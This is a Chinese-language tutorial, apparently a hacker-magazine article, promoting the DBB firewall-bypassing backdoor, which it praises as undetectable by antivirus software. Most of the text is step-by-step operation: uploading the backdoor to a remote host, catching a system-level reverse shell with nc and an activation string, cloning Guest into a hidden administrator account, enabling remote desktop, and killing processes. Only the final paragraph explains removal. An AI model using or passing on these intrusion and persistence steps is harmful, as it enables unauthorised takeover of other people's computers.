穿梭于防火牆下的黑馬 DBB後門程式
今天要為大家介紹的DarkStorm BePassFireWall BackDoor V1.2是一款成功率極高的反彈端口穿透防火牆的後門程式(以下簡稱DBB),可以穿透99%的防火牆。該後門採用線程插入技術,隱蔽性極高,在系統中以服務形式載入,擁有system許可權,一旦運行,很難將其刪除。同時,最重要的是,現在還沒有殺毒軟體能夠查殺它,可以說是現在理想的後門程式了。下面就讓我們一起來領略一下DBB的獨到魅力吧!
一、配置後門 第一步當然是把DBB當回家,在使用後門前,請先用壓縮包內的config DarkStorm.exe程式配置後門。雙擊運行config DarkStorm.exe,打開如圖1所示的配置對話窗口,根據提示輸入相關數據。其實,該後門支援不經過配置就可直接使用,這時將使用後門的默認配置:反向連接端口是8888,關鍵字是NOIR,服務名是DNScnsvc。
小提示:DBB後門服務端由DarkStorm.exe和DarkStorm.dll組成,這兩個exe和DLL文件是可以改名的,但是必須要改成同樣的名字,比如,可以把exe文件改名為123.exe,那麼dll文件也要相應的改名為123.dll。
二、打開後門 要運行後門很簡單,只要將exe和dll文件上傳到遠程主機上之後,直接運行exe文件,後門即可被載入。
小提示:exe文件和dll文件不必一定要放到system32中,但必須在同一文件夾下。
大家都知道,現在很多情況下主機是在防火牆後面的,如何讓後門來逃避防火牆的火眼金睛呢?這就需要用反向連接功能。DBB是通過嗅探激活字符來啟動反向連接的,僅支援nc反向連接。
首先在本地電腦中使用nc監聽本地電腦的8888端口,進入命令行狀態,運行如下命令: nc -l -p 8888。然後再用nc連接目標主機的任何一個防火牆允許的TCP端口(80/139/445.....),接著再開一個命令行窗口,運行命令:nc 220.202.242.101 139,然後輸入激活命令:NOIR:220.202.242.98:8888。其中220.202.242.101為木馬服務端IP地址,NOIR為反彈激活字,220.202.242.98:8888為反向連接的IP地址,也就是本機IP地址及端口。如果反向連接成功,就會在本地電腦中得到目標主機的一個系統許可權SHELL(如圖2)。
小提示:本地電腦即接受反向SHELL的系統,必須擁有獨立公網IP上網的電腦。另外,由於該後門使用的是無驅動的嗅探,無法嗅探本機對本機發起的數據請求,所以在對本機的測試中,是無法成功的。
三、輕鬆操縱 當成功獲取了目標電腦的一個系統許可權的SHELL後,就等於已經手握該台電腦的生殺大權。令人更加欣喜的是,DBB還擁有一些非常實用的控制功能。
1.帳戶克隆
為了下次能夠順利控制目標電腦,一般的手法就是克隆一個系統許可權的帳戶,在這裡,使用clone命令就可以輕鬆克隆一個本地用戶。其語法格式為:clone username clonename password,其中,username是被克隆的用戶的用戶名,一般是administrator;clonename是你要克隆為username的用戶名,一般是guest;password是你為克隆用戶設置的密碼,最長32位。例如,要把Guest克隆為管理員帳戶,並且設置密碼為snow,就只要運行命令:clone administrator guest snow(如圖3)。
2.開啟終端服務
遠程終端服務可以說是最為理想的遠程式控制制方式,因此,當成功入侵目標電腦後,大部分人總是想方設法來開啟被控電腦的終端服務。雖然說開啟3389終端服務的方法有很多,可都是有一定難度的。不過還好,有了該後門,只要用一條命令就可以輕鬆開啟3389服務,其命令為:term port。例如:運行命令“term 3389”(如圖4),這樣就將開啟目標電腦的端終服務,終端服務通訊端口為3389,重新啟動電腦即可生效。
小提示:終端服務只在Windows 2000伺服器以上版本才擁有。
3.進程管理
想知道目標電腦運行了哪些程式嗎?很簡單,運行命令:pslist,這樣就可以顯示本地所有用戶進程和相對應的pid號。如果想結束某一進程的運行,請運行命令:pskill pid,提示:pid指的是進程ID號(如圖5)。
另外,還有諸如Logoff(登出當前用戶)、Reboot(重啟系統)、Shutdown(關閉系統)、Poweroff(關閉電源)等命令可供使用。
四、封殺後門 如果不幸中了該後門,可以通過如下方法來刪除。打開註冊表編輯器,依次展開如下子鍵:HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
Services,找到並刪除該子鍵下的DNScnsvc鍵(如圖6),再重新啟動系統即可。若服務名是自己設定的,請刪除相關服務名的子鍵。
